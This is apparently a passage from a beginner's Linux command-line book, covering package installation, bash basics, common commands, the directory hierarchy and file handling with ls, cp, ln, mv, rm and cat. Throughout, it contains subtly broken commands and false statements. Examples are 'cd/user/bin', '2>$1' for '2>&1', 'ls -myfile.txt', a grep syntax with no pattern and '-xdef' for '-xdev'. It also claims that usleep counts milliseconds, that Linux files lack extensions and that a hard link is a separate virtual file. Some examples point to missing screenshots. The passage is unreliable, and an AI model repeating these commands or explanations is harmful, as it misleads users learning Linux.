Linux works better with other implementations of UNІX
Unlike the other operating system which can’t work with other
implementations of UNІX, this is not the same with Linux OS. UNІX
features and other implementations of UNІX for the personal computer are
similar to that of the Linux operating system. Linux is made to supports an
extensive range of hardware and other UNІX implementations because there
is more demand with Linux to support almost all kinds of graphics, a brand of
sound, board, SCSІ, etc. under the open-source model.
Booting and file naming
With Linux OS, there’s no limitation with booting. It can be booted right
from a logical partition or primary partition but with another operating
system like the Windows, there is the restriction of booting. It can only be
booted from the primary partition. Linux operating system file names are case
sensitive, but with others, like the Windows, it is case insensitive.
Linux operating system is customizable
Unlike another operating system, mostly with Windows, the Linux operating
system can be personalized. This is to say one or a user can modify the code
to suit any need, but it is not the same as others. One can even change Linux
OS's feel and looks.
Separating the directories
With Linux, OS directories are separated by using forward slash, but the
separation of Windows is done using a backslash. And again, Linux OS uses
the monolithic kernel which naturally takes more running space, unlike
another operating system that uses mіcrokеrnеl, which consumes lesser space
but, at the same time, its efficiency is a lot lower than when Linux is in use.
Chapter 6 Linux Command Lines
At this juncture, you should have a fair understanding of basic commands,
and Linux should be installed in your system. You now have an incredible
opportunity ahead of you – a completely blank slate where you can begin to
design an operating system. With Linux, you can easily customize your
operating system so that is does exactly what you would like for it to do. To
get started, you need to install a selection of reliable and functional
applications.
For ease of explanation, it is assumed that you are using Ubuntu. When you
are looking to install an application in Linux, the process is quite different
than what you would encounter in Windows. With Windows, you normally
need to download an installation package sourced at a website, and then you
can install the application.
With Linux, this process is not necessary as most of the applications are
stored in the distribution’s repositories. To find these applications, follow
these steps.
Go to System -> Administration -> Synaptic Package Manager
When you get to this point, you need to search for the package that you
require. In this example, the package shall be called comp. Next, you should
install the package using a command line as follows: -
sudo apt-get install comp
Linux also has another advantage over some popular operating systems. This
include the ability to install more than one package at a time, without having
to complete a process or more between windows. It all comes down to what
information is entered in the command lines. An example of this is as
follows: -
sudo apt-get install comp beta-browser
There are even more advantages (other than convenience) to being able to
install multiple packages. In Linux, these advantages include updating.
Rather than updating each application, one at a time, Linux allows for all the
applications to be updated simultaneously through the update manager.
The Linux repository is diverse, and a proper search through it will help you
to identify a large variety of apps that you will find useful. Should there be an
application that you need which is not available in the repository, Linux will
give you instructions on how you can add separate repositories.
The Command Line
Using Linux allows you to customize your system to fit your needs. For those
who are not tech savvy, the distributions settings are a good place to change
things until you get what you want. However, you could spend hours fiddling
with the available settings and still fail to find setting that is perfect for you.
Luckily, Linux has a solution and that comes in the form of the command
line. Even though the command line sounds complex, like something that can
only be understood by a tech genius, it is quite simple to discern.
The beauty of adjusting things in your operating system using the command
line, so that the sky is the limit and creativity can abound.
To begin, you need to use “The Shell”. This is basically a program which can
take in commands from your keyboard and ensure that the operating systems
performs these commands. You will also need to start a “Terminal”. A
terminal is also a program and it allows you to interact with the shell.
To be a terminal, you should select the terminal option from the menu. In this
way, you can gain access to a shell session. In this way you can begin
practicing your command prompts.
In your shell session, you should see a shell prompt. Within this shell prompt
you will be see your username and the name of the machine that you are
using, followed by a dollar sign. It will appear as follows: -
[name@mylinux me] $
If you try to type something under this shell prompt, you will see a message
from bash. For example,
[name@mylinux me] $
lmnopqrst
bash: lmnopqrst
command not found
This is an error message where the system lets you know that it is unable to
comprehend the information you put in. If you press the up-arrow key, you
will find that you can go back to your previous command, the lmnopqrst one.
If you press the down arrow key, you will find yourself on a blank line.
This is important to note because you can then see how you end up with a
command history. A command history will make it easier for you to retrace
your steps and make corrections as you learn how to use the command
prompt.
Command Lines for System Information
The most basic and perhaps most useful command lines are those that will
help you with system information. To start, you can try the following: -
Command for Date
This is a command that will help you to display the date.
root@compsis: -# date
Thursday May 21 12.31.29 IST 2o15
Command for Calendar
This command will help display the calendar of the current month, or any
other month that may be coming up.
root@compsis: -# cal
Command for uname
This command is for Unix Name, and it will provide detailed information
about the name of the machine, its operating system and the Kernel.
Navigating Linux Using Command Lines
You can use the command lines in the same way that you would use a mouse,
to easily navigate through your Linux operating system so that you can
complete the tasks you require. In this section, you will be introduced to the
most commonly used commands.
Finding files in Linux is simple, as just as they are arranged in order in
familiar Windows programmes, they also follow a hierarchical directory
structure. This structure resembles what you would find with a list of folders
and is referred to as directories.
The primary directory within a file system is referred to as a root directory. In
it, you will be able to source files, and subdirectories which could contain
additional sorted files. All files are stored under a single tree, even if there are
several storage devices.
pwd
pwd stands for print working directory. These will help you to choose a
directory where you can store all your files. Command lines do not give any
graphical representation of a filing structure. However, when using a
command line interface, you can view all the files within a parent directory,
and all the pathways that may exist in a subdirectory.
This is where the pwd comes in. Anytime that you are simply standing in a
directory, you are in a working directory. The moment you log onto your
Linux operating system, you will arrive in your home directory (which will
be your working directory while you are in it). In this directory, you can find
all your files. To identify the name of the directory that you are in, you
should use the following pwd command.
[name@mylinux me] $pwd
/home/me
You can then begin exploring within the directory by using the ls command.
ls stands for list files in the directory. Therefore, to view all the files that are
in your working directory, type in the following command and you will see
results as illustrated below.
[name@mylinux me] $ls
Desktop bin linuxcmd
GNUstep ndeit.rpm nsmail
cd
cd stands for change directory. This is the command that you need to use
when you want to switch from your working directory and view other files.
To use this command, yu need to know the pathname for the working
directory that you want to view. There are two different types of pathnames
for you to discern. There is the absolute pathname and the relative pathname.
The absolute pathname is one that starts at your root directory, and by
following a file path, it will easily lead you to your desired directory.
Suppose your absolute pathname for a directory is /usr/bin. The directory is
known as usr and there is another directory within it using the name bin. If
you want to use the cd command to access your absolute pathname, you
should type in the following command: -
[name@mylinux me] $cd/user/bin
[name@mylinux me] $pwd
/usr/bin [name@mylinux me] $ls
When you enter this information, you would have succeeded in changing
your working directory to /usr/bin.
You can use a relative pathname when you want to change the new working
directory which is /usr/bin to the parent directory, which would be /usr. To
execute this, you should type in the following prompt: -
[name@mylinux me] $cd ..
[name@mylinux me] $pwd
/usr
Using a relative pathway cuts down on the amount of typing that you must do
when using command lines, therefore, it is recommended that you learn as
many of these as possible.
When you want to access a file using Linux command prompts, you should
take note that they are case sensitive. Unlike other files which you would find
on Windows Operating Systems and programs, the files in Linux do not have
file extensions. This is great because it gives you the flexibility of labeling
the files anything that you like. One thing you need to be careful of are the
application programs that you use. There are some that may automatically
create extensions on files, and it is these that you need to be careful and
watch out for.
Chapter 7 Introduction to Linux Shell

Effective Linux professional is unthinkable without using the command line.


The command line is a shell prompt that indicates the system is ready to
accept a user command. This can be called a user dialogue with the system.
For each command entered, the user receives a response from the system:
1. another invitation, indicating that the command is executed and you can
enter the next.
2. error message, which is a statement of the system about events in it,
addressed to the user.
Users who are accustomed to working in systems with a graphical interface,
working with the command line may seem inconvenient. However, in Linux,
this type of interface has always been basic, and therefore well developed. In
the command shells used in Linux, there are plenty of ways to save effort,
that is, keystrokes when performing the most common actions:

automatic addition of long command names or file names


searching and re-executing a command that was once
performed before
substitution of file name lists by some pattern, and much more
The advantages of the command line are especially obvious when you need
to perform similar operations on a variety of objects. In a system with a
graphical interface, you need as many mice dragging as there are objects, one
command will be enough on the command line.
This section will describe the main tools that allow you to solve any user
tasks using the command line: from trivial operations with files and
directories, for example, copying, renaming, searching, to complex tasks
requiring massive similar operations that occur as in the user's application
work, when working with large data arrays or text, and in system
administration.

Shells

A command shell or command interpreter is a program whose task is to


transfer your commands to the operating system and application programs,
and their answers to you. According to its tasks, it corresponds to
command.com in MS-DOS or cmd.exe in Windows, but functionally the
shell in Linux is incomparably richer. In the command shell language, you
can write small programs to perform a series of sequential operations with
files and the data they contain — scripts.
Having registered in the system by entering a username and password, you
will see a command line prompt – a line ending in $. Later this symbol will
be used to denote the command line. If during the installation a graphical user
interface was configured to start at system boot, then you can get to the
command line on any virtual text console. You need to press Ctrl-Alt-F1 -
Ctrl-Alt-F6 or using any terminal emulation program, for example, xterm.
The following shells are available. They may differ depending on the
distributor:
bash
The most common shell for Linux. It can complement the names of
commands and files, keeps a history of commands and provides the ability to
edit them.
pdkdh
The korn shell clone, well known on UNIX shell systems.
sash
The peculiarity of this shell is that it does not depend on any shared libraries
and includes simplified implementations of some of the most important
utilities, such as al, dd, and gzip. Therefore, the sash is especially useful
when recovering from system crashes or when upgrading the version of the
most important shared libraries.
tcsh
Improved version of C shell.
zsh
The newest of the shells listed here. It implements advanced features for
autocompletion of command arguments and many other functions that make
working with the shell even more convenient and efficient. However, note
that all zsh extensions are disabled by default, so before you start using this
command shell, you need to read its documentation and enable the features
that you need.
The default shell is bash Bourne Again Shell. To check which shell you're
using, type the command: echo $ SHELL.
Shells differ from each other, not only in capabilities but also in command
syntax. If you are a novice user, we recommend that you use bash, further
examples describe the work in this particular area.
Bash shell
The command line in bash is composed of the name of the command,
followed by keys (options), instructions that modify the behavior of the
command. Keys begin with the character – or –, and often consist of a single
letter. In addition to keys, after the command, arguments (parameters) can
follow – the names of the objects on which the command must be executed
(often the names of files and directories).
Entering a command is completed by pressing the Enter key, after which the
command is transferred to the shell for execution. As a result of the command
execution on the user’s terminal, there may appear messages about the
command execution or errors, and the appearance of the next command line
prompt (ending with the $ character) indicates that the command has
completed and you can enter the next one.
There are several techniques in bash that make it easier to type and edit the
command line. For example, using the keyboard, you can:
Ctrl-A
go to the beginning of the line. The same can be done by pressing the Home
key;
Ctrl-u
delete current line;
Ctrl-C
Abort the execution of the current command.
You can use the symbol; in order to enter several commands in one line. bash
records the history of all commands executed, so it’s easy to repeat or edit
one of the previous commands. To do this, simply select the desired
command from the history: the up key displays the previous command, the
down one and the next one. In order to find a specific command among those
already executed, without flipping through the whole story, type Ctrl-R and
enter some keyword used in the command you are looking for.

Commands that appear in history are numbered. To run a specific


command, type:

! command number
If you enter !!, the last command typed starts.
Sometimes on Linux, the names of programs and commands are too long.
Fortunately, bash itself can complete the names. By pressing the Tab key,
you can complete the name of a command, program, or directory. For
example, suppose you want to use the bunzip2 decompression program. To
do this, type:
bu
Then press Tab. If nothing happens, then there are several possible options
for completing the command. Pressing the Tab key again will give you a list
of names starting with bu. For example, the system has buildhash, builtin,
bunzip2 programs:
$ bu
buildhash builtin bunzip2
$ bu
Type n> (bunzip is the only name whose third letter is n), and then press Tab.
The shell will complete the name and it remains only to press Enter to run the
command!
Note that the program invoked from the command line is searched by bash in
directories defined in the PATH system variable. By default, this directory
listing does not include the current directory, indicated by ./ (dot slash).
Therefore, to run the prog program from the current directory, you must issue
the command ./prog.

Basic commands

The first tasks that have to be solved in any system are: working with data
(usually stored in files) and managing programs (processes) running on the
system. Below are the commands that allow you to perform the most
important operations on working with files and processes. Only the first of
these, cd, is part of the actual shell, the rest are distributed separately, but are
always available on any Linux system. All the commands below can be run
both in the text console and in graphical mode (xterm, KDE console). For
more information on each command, use the man command, for example:
man ls
cd
Allows you to change the current directory (navigate through the file system).
It works with both absolute and relative paths. Suppose you are in your home
directory and want to go to its tmp / subdirectory. To do this, enter the
relative path:
cd tmp /
To change to the / usr / bin directory, type (absolute path):
cd / usr / bin /
Some options for using the command are:
cd ..
Allows you to make the current parent directory (note the space between cd
and ..).
cd -
Allows you to return to the previous directory. The cd command with no
parameters returns the shell to the home directory.
ls
ls (list) lists the files in the current directory. Two main options: -a - view all
files, including hidden, -l - display more detailed information.
rm
This command is used to delete files. Warning: deleting the file, you cannot
restore it! Syntax: rm filename.
This program has several parameters. The most frequently used ones are: -i -
file deletion request, -r - recursive deletion (i.e. deletion, including
subdirectories and hidden files). Example:
rm -i ~ / html / *. html
Removes all .html files in your html directory.
mkdir, rmdir
The mkdir command allows you to create a directory, while rmdir deletes a
directory, provided it is empty. Syntax:
mkdir dir_name
rmdir dir_name
The rmdir command is often replaced by the rm -rf command, which allows
you to delete directories, even if they are not empty.
less
less allows you to page by page. Syntax:
less filename
It is useful to review a file before editing it; The main use of this command is
the final link in a chain of programs that outputs a significant amount of text
that does not fit on one screen and otherwise flashes too quickly. To exit less,
press q (quit).

grep
This command allows you to find a string of characters in the file. Please note
that grep searches by a regular expression, that is, it provides the ability to
specify a template for searching a whole class of words at once. In the
language of regular expressions, it is possible to make patterns describing, for
example, the following classes of strings: “four digits in a row, surrounded by
spaces”. Obviously, such an expression can be used to search in the text of all
the years written in numbers. The search capabilities for regular expressions
are very wide. For more information, you can refer to the on-screen
documentation on grep (man grep). Syntax:
grep search_file

ps

Displays a list of current processes. The command column indicates the


process name, the PID (process identifier) is the process number (used for
operations with the process — for example, sending signals with the kill
command). Syntax:
ps arguments
Argument u gives you more information, ax allows you to view those
processes that do not belong to you.
kill
If the program stops responding or hangs, use this command to complete it.
Syntax:
kill PID_number
The PID_number here is the process identification number, You can find out
the process number for each executable program using the ps command.
Normally, the kill command sends a normal completion signal to the process,
but sometimes it does not work, and you will need to use kill -9 PID_number.
In this case, the command will be immediately terminated by the system
without the possibility of saving data (abnormal). The list of signals that the
kill command can send to a process can be obtained by issuing the command
kill -l.
File and Directory Operations

Here we consider utilities that work with file system objects: files,
directories, devices, as well as file systems in general.
cp
Copies files and directories.
mv
Moves (renames) files.
rm
Removes files and directories.
df
Displays a report on the use of disk space (free space on all disks).
du
Calculates disk space occupied by files or directories.
ln
Creates links to files.
ls
Lists files in a directory, supports several different output formats.
mkdir
Creates directories.
touch
Changes file timestamps (last modified, last accessed), can be used to create
empty files.
realpath
Calculates absolute file name by relative.
basename
Removes the path from the full file name (i.e., shortens the absolute file name
to relative).
dirname
Removes the file name from the full file name (that is, it displays the full
name of the directory where the file is located).
pwd
Displays the name of the current directory.

Filters

Filters are programs that read data from standard input, convert it and output
it to standard output. Using filtering software allows you to organize a
pipeline: to perform several sequential operations on data in a single
command. More information about standard I / O redirection and the pipeline
can be found in the documentation for bash or another command shell. Many
of the commands listed in this section can work with files.
cat
combines files and displays them to standard output;
tac
combines files and displays them on standard output, starting from the end;
sort
sorts rows;
uniq
removes duplicate lines from sorted files;
tr
performs the replacement of certain characters in the standard input for other
specific characters in the standard output, can be used for transliteration,
deletion of extra characters and for more complex substitutions;
cut
systematized data in text format can be processed using the cut utility, which
displays the specified part of each line of the file; cut allows you to display
only the specified fields (data from some columns of the table in which the
contents of the cells are separated by a standard character — a tabulation
character or any other), as well as characters standing in a certain place in a
line;
paste
combines data from several files into one table, in which the data from each
source file make up a separate column;
csplit
divides the file into parts according to the template;
expand
converts tabs to spaces;
unexpand
converts spaces to tabs;
fmt
formats the text in width;
fold
transfers too long text lines to the next line;
nl
numbers file lines;
od
displays the file in octal, hexadecimal and other similar forms;
tee
duplicates the standard output of the program in a file on disk;

Other commands

head
displays the initial part of the file of the specified size;
tail
outputs the final part of a file of a given size, since it can output data as it is
added to the end of the file, used to track log files, etc.;
echo
displays the text of the argument on the standard output;
false
does nothing, comes out with a return code of 1 (error), can be used in shell
scripts if an unsuccessful command is being attempted;
true
does nothing, comes out with a return code of 0 (successful completion), can
be used in scripts if a successful command is required;
yes
infinitely prints the same line (by default, yes) until it is interrupted.
seq
displays a series of numbers in a given range of successively increasing or
decreasing by a specified amount;
sleep
suspends execution for a specified number of seconds;
usleep
suspends execution for a specified number of milliseconds;
comm
compares 2 pre-sorted (by the sort command) files line by line, displays a
table of three columns, where in the first are lines unique to the first file, in
the second are unique to the second, in the third they are common to both
files;
join
combines lines of two files on a common field;
paste
For each pair of input lines with the same common fields, print the line to
standard output. By default, the general field is considered first, the fields are
separated by whitespace.
split
splits the file into pieces of a given size.
Calculations
In addition to simple operations with strings (input/output and merging), it is
often necessary to perform some calculations on the available data. Listed
below are utilities that perform calculations on numbers, dates, strings.
test
returns true or false depending on the value of the arguments; The test
command is useful in scripts to check conditions;
date
displays and sets the system date, in addition, it can be used for calculations
over dates;
expr
evaluates expressions;
md5sum
calculates checksum using MD5 algorithm;
sha1sum
calculates checksum using SHA1 algorithm;
wc
counts the number of lines, words, and characters in the file;
factor
decomposes numbers into prime factors;

Search

The search for information in the file system can be divided into a search by
file attributes (understanding them extensively, that is, including the name,
path, etc.) and content search. For these types of search, the programs find
and grep are usually used, respectively. Thanks to convenient interprocess
communication tools, these two types of search are easy to combine, that is,
to search for the necessary information only in files with the necessary
attributes.

Attribute search
The main search tool for file attributes is the find program. A generalized call
to find looks like this: find path expression, where path is a list of directories
in which to search, and expression is a set of expressions that describe the
criteria for selecting files and the actions to be performed on the files found.
By default, the names of found files are simply output to standard output, but
this can be overridden and the list of names of found files can be transferred
to any command for processing. By default, find searches in all subdirectories
of directories specified in the path list.

Expressions

Expressions that define file search criteria consist of key-value pairs. Some of
the possible search options are listed below:
-amin, -anewer, -atime
The time of the last access to the file. Allows you to search for files that were
opened for a certain period of time, or vice versa, for files that nobody has
accessed for a certain period.
-cmin, -cnewer, -ctime
The time the file was last changed.
-fstype
The type of file system on which the file is located.
-gid, -group
User and group that owns the file.
-name, -iname
Match the file name to the specified pattern.
-regex, -iregex
Match the file name to a regular expression.
-path, -ipath
Match the full file name (with the path) to the specified pattern.
-perm
Access rights.
-size
File size.
-type
File type.
Actions
The find program can perform various actions on the found files. The most
important of them are:
-print
Output the file name to the standard output (the default action);
-delete
delete a file;
-exec
execute the command by passing the file name as a parameter.
You can read about the rest in the on-screen documentation for the find
command, by issuing the man find command.

Options

Parameters affect the overall behavior of find. The most important of them
are:
-maxdepth
maximum search depth in subdirectories;
-mindepth
minimum search depth in subdirectories;
-xdef
Search only within the same file system.
You can read about the rest in the on-screen documentation for the find
command.
Terminals

The terminal in Linux is a program that provides the user with the ability to
communicate with the system using the command line interface. Terminals
allow you to transfer to the system and receive only text data from it. The
standard terminal for the Linux system can be obtained on any textual virtual
console, and in order to access the command line from the graphical shell,
special programs are needed: terminal emulators. Listed below are some of
the terminal emulators and similar programs included in the ALT Linux 2.4
Master distribution.
xterm
Programs: resize, uxterm, xterm.
Standard terminal emulator for the X Window System. This emulator is
compatible with DEC VT102 / VT220 and Tektronix 4014 terminals and is
designed for programs that do not use the graphical environment directly. If
the operating system supports changing the terminal window (for example, a
SIGWINCH signal on systems that have gone from 4.3bsd), xterm can be
used to inform programs running on it that the window size has changed.
aterm
Aterm is a color emulator of the terminal rxvt version 2.4.8, supplemented
with NeXT-style scroll bars by Alfredo Kojima. It is intended to replace the
xterm if you do not need a Tektronix 4014 terminal emulation.
console-tools
Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt,
dumpkeys, fgconsole, "" setkeycodes, setleds, setmetamode, setvesablank,
showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt.
This package contains tools for loading console fonts and keyboard layouts.
It also includes a variety of fonts and layouts.
In case it is installed, its tools are used during boot / login to establish the
system / personal configuration of the console.
screen
The screen utility allows you to execute console programs when you cannot
control their execution all the time (for example, if you are limited to session
access to a remote machine).
For example, you can perform multiple interactive tasks on a single physical
terminal (remote access session) by switching between virtual terminals using
a screen installed on a remote machine. Or this program can be used to run
programs that do not require direct connection to the physical terminal.
Install the screen package if you may need virtual terminals.
vlock
The vlock program allows you to block input when working in the console.
Vlock can block the current terminal (local or remote) or the entire system of
virtual consoles, which allows you to completely block access to all consoles.
Unlocking occurs only after successful authorization of the user who initiated
the console lock.
Chapter 8 Basic Linux Shell Commands
Introduction
We are not going to look at some useful commands for file handling and
similar uses. Before going into more details, let’s look at the Linux file
structure.
Linux stores files in a structure known as the virtual directory structure.
This is a single directory structure. It incorporates all the storage devices
into a single tree. Each storage device is considered as a file. If you
examine the path of a file, you do not see the disk information. For
instance, the path to my desktop is, /home/jan/Desktop. This does not
display any disk information in its path. By this way, you do not need to
know the underlying architecture.
If you are to add another disk to the existing, you simply use mount point
directories to do so. Everything is connected to the root.
These files naming is based on the FHS (Filesystem Hierarchy Standard).
Let’s look at the common files once more. We already went through the
directory types during the installation.
Table: Linux directory types
Directory Purpose
/ This is the root home directory. The upper-most level.
/bin This is the binary store. GNU utilities (user-level) exist in this
directory.
/boot This is where the system stores the boot directory and files
used during the boot process.
/dev Device directory and nodes.
/etc This is where the system stores the configuration files.
/home Home of user directories.
/lib System and application libraries.
/media This is where media is mounted, media such as CDs, USB
drives.
/mnt Where the removable media is mounted to.
/opt Optional software packages are stored here.
/proc Process information – not open for users.
/root Home directory of root.
/run Runtime data is stored here.
/sbin System binary store. Administrative utilities are stored here.
/srv Local services store their files here.
/sys System hardware information is stored here.
/tmp This is the place for temporary files.
/usr This is where the user-installed software are stored.
/var Variable director where the dynamic files such as logs are
stored.

Directory and File Navigation


To view a list of directories in the present directory, in Windows you use the
dir command. This command works the same way on Linux.
To navigate to files, the most basic method is to use the full path to the file
such as /home/jan/Desktop/. There are basic commands to do this with easier.

1. Know your present working directory with pwd command.

Change the directory location using the cd command. Here we use the
absolute path.

2. Get back to the home directory using the cd command only.


Now we will use the relative path to make things easier and less time-
consuming. In this case, we can use the ‘/’.

Here, the dir command lists directories under my current folder. I could
jump to desktop folder using the command cd Desktop.
There are 2 special characters when it comes to directory traversal. Those are
‘.’ And ‘..’. Single dot represents the current directory. Double dots represent
the upper folder.

5. To go back to one level up, use the ‘..’ for instance

6. You can also use ‘..’ to skip typing folder paths. For instance,
7. You can go back one level and go forward. Here, you go up to
the home folder and then go forward (down) to the Music
folder.

8. You can do the ‘../’ in a chain to go to a folder in an upper


level, back and forth using absolute path (mixing relative and
absolute paths).

Listing Files
We use ls command to list files. This is one of the most popular
commands among Linux users. Below is a list of ls commands and their
use.
ls- a List all files including all the
hidden files starting with ‘.’
ls --color Colored list [=always/never/auto]
ls -d List the directories with ‘*/’
ls -F Append indicator to entries (such as
one of */=>@|)
ls -i Lists the inode index
ls -l List with long format including
permissions
ls- la Same as above with hidden files
ls -lh The long list with human readable
format
ls -ls The long list with file size
ls -r Long list in reverse
ls -R List recursively (the directory tree)
ls -s List file size
ls -S List by size
ls -t Sort by date/time
ls -X Sort by extension name

Let’s examine a few commands. Remember, you can use more than one
argument. E.g., ls -la
Syntax: ls [option ...] [file]...
Detailed syntax:
ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape]
[--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]]
[-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type]
[--format=word] [--full-time] [-g] [--group-directories-first]
[-G | --no-group] [-h | --human-readable] [--si]
[-H | --dereference-command-line] [--dereference-command-line-symlink-
to-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode]
[-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference]
[-m] [-n | --numeric-uid-gid] [-N | --literal] [-o]
[-p | --indicator-style=slash] [-q | --hide-control-chars]
[--show-control-chars] [-Q | --quote-name] [--quoting-style=word]
[-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word]
[--time=word] [--time-style=style] [-t] [-T | --tabsize=cols]
[-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1]
Example: ls -l setup.py

This gives long list style details for this specific file.
More examples
List content of your home directory: ls
Lists content of your parent directory: ls */
Displays directories of the current directory: ls -d */
Lists the content of root: ls /
Lists the files with the following extensions: ls *.{htm,sh,py}
Lists the details of a file. If not found suppress the errors: ls -myfile.txt
2>/dev/null
A word on /dev/null
/dev/null is an important location. This is actually a special file called the
null device. There are other names, such as blackhole or bit-bucket.
When something is written to this file, it immediately discards it and
returns and end-of-file (EOF).
When a process or a command returns an error STDERR or the standard error
is the default file descriptor a process can write into. These errors will be
displayed on screen. If someone wants to suppress it, that is where the null
device becomes handy.
We often write this command line as /dev/null 2>&1. For instance,
ls- 0 > /dev/null 2>$1
What does it mean by 2 and $1. The file descriptors for Standard Input (stdin)
is 0. For Standard Output (stdout), it is 1. For Standard Error (stderr) it is 2.
Here, we are suppressing the error generated by the ls command. It is
redirected to stdout and then writing it to the /dev/null thus discarding it
immediately.

ls Color Codes

ls color codes
These color codes distinguish the file types quite well
Let’s run ls -lasSt

This uses a long list format, displays all files, sorts by time. Now, you need to
understand what these values are.
1. 4: File size (sorted by size).
2. In the next section d is for directory.
3. The next few characters represent permissions (r-read, w-write,
x-execute).
4. Number of hard links.
5. File owner.
6. File owner’s group.
7. Byte size.
8. Last modified time (sort by).
9. File/Directory name.
If you use -i in the command (S is removed, sorted by last modified time).
You see the nodes in the left most area.

Example: ls -laxo

Using ls for Pattern Matching


The ls command can be used in conjunction with wildcards such as ‘*’ and
‘?’ Here the ‘*’ represents multiple characters and ‘?’ represents a single
character.
In this example, we have the following folder with the following directories
and files.
We are trying to find a file with the name vm* (vm and any characters to the
right). And then we will try to match the INSTALL name of the file. In the
first attempt it fails as there 4 ‘?’s. The next one succeeds.

We will now use the or logic to match a pattern.

Image: Folders in my directory


Let’s see if we can only list the directories with the characters a and i in
the middle.

Another example using pipes:


ls -la | less
Handling Files
In this section, we will create, modify, copy, move and delete files. You will
also learn how to read files and do other tasks.
Creating a File
To create files and to do some more tasks we use the command touch.
touch test.txt

Syntax: touch [OPTION]... FILE...


Detailed syntax: touch [[-a] [-m] | [--time=timetype] [...]] [[-d
datestring] | [-t timestamp]] [-c] [-f] [-h] [-r reffile] file [file ...]
This command can also be used to change the file access time of a file.

To change only the last access time, use -a.


Example: touch -a test1.txt

Here, to view the output you use –time parameter in the ls command. With
only the ls -l it does not display the last access time but the last modified
time.
Copying Files
To copy files, use the cp command.
Syntax: cp [option]... [-T] source destination
Example: cp test1.txt test2.txt

Copy command can be dangerous as it does not ask if test2.txt exists. It


leads to a data loss. Therefore, always use -i option.

You can answer with y or n to accept or deny.


Copying a file to another directory: cp test1.txt /home/jan/Documents

Using relative path instead the absolute path.


Now I am at the following directory: /home/jan/Desktop. I want to copy a file
to /home/jan/Documents
Command: cp test1.txt ../Documents

Copy a file to the present working directory using the relative path. Here we
will use ‘.’ to denote the pwd.
Recursively copy files and folders
Example: cp -R copies the folder snapt with files to snipt.

Let’s copy a set of files recursively from one directory to its sub directory.
Command: cp -R ./Y/snapt/test* ./Y/snopt

This is my desktop. I have these files in the Y directory on Desktop. I want to


copy test1.txt and test2.txt from Y to snopt directory. After executing the
command,

How to use wildcards? We already used it in this example, haven’t we?

Linking Files with Hard and Symbolic Links


Another feature of the Linux file system is the ability to link files. Without
maintaining original copies of files everywhere, you can link files to keep
virtual copies of the same file. You can think of a link as a placeholder. There
are 2 types of links,
- Symbolic links
- Hard links
A symbolic link is another physical file. It is not a shortcut. This file is linked
to another file in the file system. Unlike a shortcut, the symlink gets instant
access to the data object.
Syntax: ln -s [OPTIONS] FILE LINK
Example: ln -s ./Y/test1.txt testn.txt

If you check the inode you will see these are different files. The size can tell
the same difference.
- 279185 test1.txt
- 1201056 testn.txt
When you create symlinks, the destination file should not be there (especially
directory with the destination symlink name should not be there). However,
you can force the command to create or replace the file.

The ln command is also valid for directories.

If you wish to overwrite symlinks, you have to use the -f as stated above.
Or else, if you want to replace the symlink from a file to another, use -n.
Example: I have 2 directories dir1 and dir2 on my desktop. I create a
symlink - dir1 to sym. Then I want to link sym to dir 2 instead. If I use -s
and -f together (-sf) it does not work. The option to us here is -n.
Unlinking
To remove the symlinks you can use the following commands.
- Syntax: unlink linkname
- Syntax: rm linkname
Creating Hard Links
Now we will look at creating hard links. Hard link creates a separate virtual
file. This file includes information about the original file and its location.
Example: ln test1.txt hard_link
Here we do not see any symbolic representations. That means the file is an
actual physical file. And if you look at the inode, you will see both files
having the same inode number.

How do we identify a hard link? Usually the files connected to a file is 1. In


other words, itself. If the number is 2, that means it has a connection to
another file.
Another example,

Symbolic link does not change this increment of hard link number for each
file. See the following example.

What happens if the original file is removed?

Now here you can see the hard_link has reduced to its links to 1. The
symbolic link displays a broken or what we call the orphan state.

File Renaming
Next, we will look at how file renaming works. For this the command
used is mv. mv stands for “move”.
Syntax: mv [options] source dest
Example: mv LICENSE LICENSE_1
You must be cautious when you use this command. If you do the following,
what would happen?

One advantage of this command is that you can move and rename the file all
together, especially when you do it from one location to another.
Example: Moving /home/jan/Desktop/Y/snapt to /Desktop while renaming it
so Snap. This is similar to a cut and paste on Windows except for the
renaming part.
Example: mv /home/jan/Desktop/Y/snapt/ ./Snap

Removing Files
To remove files, use rm command. rm command does not ask you if you
want to delete the file. Therefore, you must use the -i option with it.
Syntax: rm [OPTION]... FILE...
Managing Directories
There is a set of commands to create and remove directories.
To create a directory, use the mkdir command.
To remove a directory, use the rmdir command.
Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...]
rmdir [-p] [-v | –verbose] [–ignore-fail-on-non-empty] [directories …]
Example: Creating a set of directories with the mkdir command. To create a
tree of directories you must use -p. If you try without it, you won’t succeed.

Command: mkdir -p ./Dir1/Dir1_Child1/Child1_Child2

Example: rmdir ./Dir1/Dir1_Child1/Child1_Child2

To remove a directory with the rmdir command is not possible if the


directory has files in it.

You have to remove the files first in order to remove the directory. In this
case, you can use another command to do this recursively.
Example: rm -rf /Temp

Managing File Content


File content management is extremely useful for day to day work. You can
use several commands to view and manage content.
Let’s look at the file command first. It helps us to have a peak into the file
and see what it actually is. It can do more.
- This command provides an overview of the file.
- It tells you if the file is a directory.
- It tells you if the file is a symbolic link.
- It can display file properties especially against binary executables (a
secure operation).
- It may brief you about the content (i.e., when executed against a script
file).
Syntax: file [option] [filename]

Viewing Files with cat Command


To view files, you cannot use the file command. You can use a more
versatile command known as cat.
Syntax: cat [OPTION] [FILE]...
This command is an excellent tool to view a certain file or files at once, parts
of the files and especially logs.
Example: cat test.txt
Example: Viewing 2 files together.
Command: cat test.txt testx.txt

Creating files with cat is also possible. The following command can create a
file.
Example: cat >testy
The cat command can be used with 2 familiar commands we used earlier.
The less and more commands.
Example: cat test.txt | more

Example: cat test.txt | less

Example: Displaying a line number with cat.


Command: cat -n testx.txt
Overwriting the Files with cat - You can use the redirection (standard
input) operator (>). The following command will overwrite the text file.
This is a useful tool, but you have to use it with caution. This can be
performed for multiple files to obtain a single file.
Example: cat test.txt > testx.txt
Appending file content with cat without overwriting – Since the previous
command causes overwriting, it cannot be used if you are willing to append a
content from one file to another.
